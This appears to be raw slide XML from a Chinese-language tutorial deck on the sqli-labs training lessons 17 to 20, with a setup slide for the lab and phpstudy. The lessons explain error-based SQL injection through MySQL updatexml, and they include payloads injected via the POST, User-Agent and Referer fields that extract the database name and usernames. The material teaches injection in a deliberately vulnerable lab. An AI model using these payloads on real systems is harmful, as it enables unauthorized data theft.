            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>Doc </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>第二个参数：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>XPath_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>Xpath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>格式的字符串</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>，如果不了解</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>Xpath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>语法，可以在网上查找教程。 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>第三个参数：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>new_value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>String</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>格式，替换查找到的符合条件的数据 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>作用：改变文档中符合条件的节点的值</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>改变</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>XML_document</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>中符合</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>XPATH_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>的值</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>而我们的注入语句为：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>updatexml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>(1,concat(0x7e,(SELECT username from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>security.users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> limit 0,1),0x7e),1);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>其中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>concat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>函数是将其连成一个字符串，因此不会符合</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>XPATH_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>的格式，从而出现格式错误，爆出</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>ERROR 1105 (HY000): XPATH syntax error: '~Dumb~'</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4000635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88806" y="160623"/>
            <a:ext cx="10131425" cy="525420"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>Less-17</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  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>而且要是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>update</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>后也加上。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>使用了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>get_magic_quotes_gpc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>      name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>分开验证，而且在验证的时候对于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>进行了过滤处理，将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>进行了转义</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>首先我们要知道用户的名字是多少，然后才可以进行接下来的操作</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>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0,1),0x7e),1)#&amp;submit=Submit  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>通过查询，可以得到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>库下面的其中一个表名字</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0,1),0x7e),1)#&amp;submit=Submit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>同样的方法可以获得其他的数据</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1860369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337654"/>
            <a:ext cx="10131425" cy="525420"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>Less-18</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117763" y="1510145"/>
            <a:ext cx="11762509" cy="5506413"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2300" dirty="0"/>
              <a:t>以下均为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0"/>
              <a:t>POST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2300" dirty="0"/>
              <a:t>内容：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0"/>
              <a:t> ‘and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0" err="1"/>
              <a:t>updatexml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0"/>
              <a:t>(1,concat(0x7e,(database()),0x7e),1) and ’1‘= ‘1</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2300" dirty="0"/>
              <a:t>注册登录再注入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0"/>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2300" dirty="0"/>
              <a:t>登录失败显示</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2300" dirty="0"/>
              <a:t>地址</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0"/>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2300" dirty="0"/>
              <a:t>登录成功显示</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2300" dirty="0"/>
              <a:t>地址和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0"/>
              <a:t>User-Agent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0"/>
              <a:t>3. $insert="INSERT INTO `security`.`</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0" err="1"/>
              <a:t>uagents</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0"/>
              <a:t>` (`</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0" err="1"/>
              <a:t>uagent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0"/>
              <a:t>`, `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0" err="1"/>
              <a:t>ip_address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0"/>
              <a:t>`, `username`) VALUES ('$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0" err="1"/>
              <a:t>uagent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0"/>
              <a:t>', '$IP', $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0" err="1"/>
              <a:t>uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0"/>
              <a:t>)";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0"/>
              <a:t>4. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2300" dirty="0"/>
              <a:t>分析后得知，需要进行闭合操作，两种方法：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2300" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2300" dirty="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0"/>
              <a:t>' or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0" err="1"/>
              <a:t>updatexml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0"/>
              <a:t>(1,concat(0x7e,(database())),1) and '1'=‘1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2300" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2300" dirty="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="zh-CN" sz="2300" dirty="0"/>
              <a:t>‘ or updatexml(1,concat(0x7e,(database())),1), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="zh-CN" sz="2300" dirty="0"/>
              <a:t>, ‘’)# (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2300" dirty="0"/>
              <a:t>注意在直接复制的时候，可能出现错误</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="zh-CN" sz="2300" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2300" dirty="0"/>
              <a:t>然后再通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0" err="1"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2300" dirty="0"/>
              <a:t>注入语句进行操作即可！</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="23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25925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Less-19</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46909"/>
            <a:ext cx="11762509" cy="5187758"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2300" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1900" dirty="0"/>
              <a:t>以下均为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t>POST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1900" dirty="0"/>
              <a:t>内容：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t> ‘and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0" err="1"/>
              <a:t>updatexml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t>(1,concat(0x7e,(database()),0x7e),1) and ’1‘= ‘1</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1900" dirty="0"/>
              <a:t>注册登录再注入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1900" dirty="0"/>
              <a:t>登录成功显示的是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0" err="1"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1900" dirty="0"/>
              <a:t>信息</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1900" dirty="0"/>
              <a:t>登录失败是没有回显信息的</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t>3. $insert="INSERT INTO `security`.`</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0" err="1"/>
              <a:t>referers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t>` (`</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0" err="1"/>
              <a:t>referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t>`, `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0" err="1"/>
              <a:t>ip_address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t>`) VALUES ('$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0" err="1"/>
              <a:t>uagent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t>', '$IP')";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t>4. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1900" dirty="0"/>
              <a:t>分析后得知，需要进行闭合操作，两种方法：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1900" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1900" dirty="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t>' or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0" err="1"/>
              <a:t>updatexml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t>(1,concat(0x7e,(database())),1) and '1'=‘1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1900" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1900" dirty="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t>‘ or updatexml(1,concat(0x7e,(database())),1), ‘’)#  (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1900" dirty="0"/>
              <a:t>注意在直接复制的时候，可能出现错误，因为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t>ppt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1900" dirty="0"/>
              <a:t>格式的问题</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="zh-CN" sz="1900" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1900" dirty="0"/>
              <a:t>然后再通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1900" dirty="0" err="1"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1900" dirty="0"/>
              <a:t>注入语句进行操作即可！</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="19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59773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14735" y="208870"/>
            <a:ext cx="7215411" cy="428437"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Sqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-labs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>phpstudy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>下载和安装</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p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>下载：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>sqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>-labs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://github.com/Audi-1/sqli-labs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" u="sng" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFC000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>phpstudy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>下载地址：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>http://down.php.cn/PhpStudy20180211.zip</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" u="sng" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFC000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>安装：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>sqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>-labs: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>修改</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>db-creds.inc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>账号密码！</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="293522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Less-20</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>cookie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>登录失败会显示失败信息。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
